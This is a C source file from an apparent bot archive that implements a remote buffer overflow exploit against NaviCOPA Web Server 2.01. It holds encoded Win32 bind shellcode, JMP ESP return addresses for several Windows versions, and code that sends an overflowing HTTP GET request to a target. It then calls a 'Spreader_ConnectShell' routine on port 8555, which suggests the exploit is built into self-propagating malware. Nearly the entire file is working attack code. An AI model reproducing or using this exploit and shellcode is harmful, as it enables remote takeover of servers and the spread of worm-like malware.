www.pudn.com > abot.rar > navi.cpp, change:2007-05-27,size:3536b


#include <winsock2.h> 
//#define PORT 80 
#define BUFF_SIZE 1024 
 
typedef struct 
 { 
 char os_name[32]; 
 unsigned long ret; 
 } target; 
 
 
char shellcode[] = 
 
/* 
Win32_bind shellcode 
Encoder: PexFnstenvMov 
Bad chars: 0x00 0x20 0x0a 0x0d 0x2f 0x3f 
Thx metasploit.com 
*/ 
 
"\x6a\x50\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x91\xba\x06" 
"\x13\x83\xeb\xfc\xe2\xf4\x6d\xd0\xed\x5e\x79\x43\xf9\xec\x6e\xda" 
"\x8d\x7f\xb5\x9e\x8d\x56\xad\x31\x7a\x16\xe9\xbb\xe9\x98\xde\xa2" 
"\x8d\x4c\xb1\xbb\xed\x5a\x1a\x8e\x8d\x12\x7f\x8b\xc6\x8a\x3d\x3e" 
"\xc6\x67\x96\x7b\xcc\x1e\x90\x78\xed\xe7\xaa\xee\x22\x3b\xe4\x5f" 
"\x8d\x4c\xb5\xbb\xed\x75\x1a\xb6\x4d\x98\xce\xa6\x07\xf8\x92\x96" 
"\x8d\x9a\xfd\x9e\x1a\x72\x52\x8b\xdd\x77\x1a\xf9\x36\x98\xd1\xb6" 
"\x8d\x63\x8d\x17\x8d\x53\x99\xe4\x6e\x9d\xdf\xb4\xea\x43\x6e\x6c" 
"\x60\x40\xf7\xd2\x35\x21\xf9\xcd\x75\x21\xce\xee\xf9\xc3\xf9\x71" 
"\xeb\xef\xaa\xea\xf9\xc5\xce\x33\xe3\x75\x10\x57\x0e\x11\xc4\xd0" 
"\x04\xec\x41\xd2\xdf\x1a\x64\x17\x51\xec\x47\xe9\x55\x40\xc2\xe9" 
"\x45\x40\xd2\xe9\xf9\xc3\xf7\xd2\x17\x4f\xf7\xe9\x8f\xf2\x04\xd2" 
"\xa2\x09\xe1\x7d\x51\xec\x47\xd0\x16\x42\xc4\x45\xd6\x7b\x35\x17" 
"\x28\xfa\xc6\x45\xd0\x40\xc4\x45\xd6\x7b\x74\xf3\x80\x5a\xc6\x45" 
"\xd0\x43\xc5\xee\x53\xec\x41\x29\x6e\xf4\xe8\x7c\x7f\x44\x6e\x6c" 
"\x53\xec\x41\xdc\x6c\x77\xf7\xd2\x65\x7e\x18\x5f\x6c\x43\xc8\x93" 
"\xca\x9a\x76\xd0\x42\x9a\x73\x8b\xc6\xe0\x3b\x44\x44\x3e\x6f\xf8" 
"\x2a\x80\x1c\xc0\x3e\xb8\x3a\x11\x6e\x61\x6f\x09\x10\xec\xe4\xfe" 
"\xf9\xc5\xca\xed\x54\x42\xc0\xeb\x6c\x12\xc0\xeb\x53\x42\x6e\x6a" 
"\x6e\xbe\x48\xbf\xc8\x40\x6e\x6c\x6c\xec\x6e\x8d\xf9\xc3\x1a\xed" 
"\xfa\x90\x55\xde\xf9\xc5\xc3\x45\xd6\x7b\x61\x30\x02\x4c\xc2\x45" 
"\xd0\xec\x41\xba\x06\x13"; 
 
char buffyr[BUFF_SIZE]; 
 
target list[] = 
 { 
 "XP SP2 Polish", 
 0x7d168877, //JMP ESP 
 
 "XP SP2 English", 
 0x7ca58265, //JMP ESP 
 
 "XP SP2 German", 
 0x7cb4d5ac, //JMP ESP 
 
 "2000 SP4 Polish", 
 0x77596433, //JMP ESP 
 
 "2000 SP4 English", 
 0x78326433  //JMP ESP 
 }; 
 
void navi(exparam_s exparam) 
{ 
WSADATA wsa; 
int sock, os, r_len, 
a = (sizeof(list) / sizeof(target)) - 1; 
unsigned long eip; 
//struct hostent *he; 
struct sockaddr_in client; 
 
//printf("\n[*] NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit\n"); 
//printf("[*] Coded by h07 <h07@interia.pl>\n"); 
 
/*if(argc < 3) 
 { 
 printf("[*] Usage: %s <host> <system>\n", argv[0]); 
 printf("[*] Sample: %s 192.168.0.1 0\n", argv[0]); 
 printf("[*] Systems..\n"); 
 for(i = 0; i <= a; i++) 
 printf("[>] %d: %s\n", i, list[i].os_name); 
 return 1; 
 }*/ 
 
WSAStartup(MAKEWORD(2, 0), &wsa); 
 
os = atoi("1"); 
 
 
 
eip = list[os].ret; 
 
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); 
 
 
 
client.sin_addr = *((struct in_addr *)exparam.ip); 
client.sin_port = htons(exparam.port); 
client.sin_family = AF_INET; 
 
if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1) 
 { 
 //printf("[-] Error: connect()\n"); 
 return; 
 } 
 
r_len = 234; 
memset(buffyr, 0x41, r_len); 
memcpy(buffyr, "GET ", 4); 
*((unsigned long*)(&buffyr[r_len])) = eip; 
memset(buffyr + (r_len + 4), 0x90, 32); 
strcat(buffyr, shellcode); 
strcat(buffyr, " HTTP/1.1\r\n\r\n\x00"); 
 
//buffer["GET " + ("A" * 230) + RET + (NOP * 32) + shellcode + " HTTP/1.1\r\n\r\n\x00"] 
 
if(send(sock, buffyr, strlen(buffyr), 0) != -1) 
 { 
Sleep(1000); 
Spreader_ConnectShell(exparam, 8555); 
 } 
 else 
// printf("[-] Sending buffer: failed\n"); 
 
//printf("[*] Press enter to quit\n"); 
//getchar(); 
 
return; 
}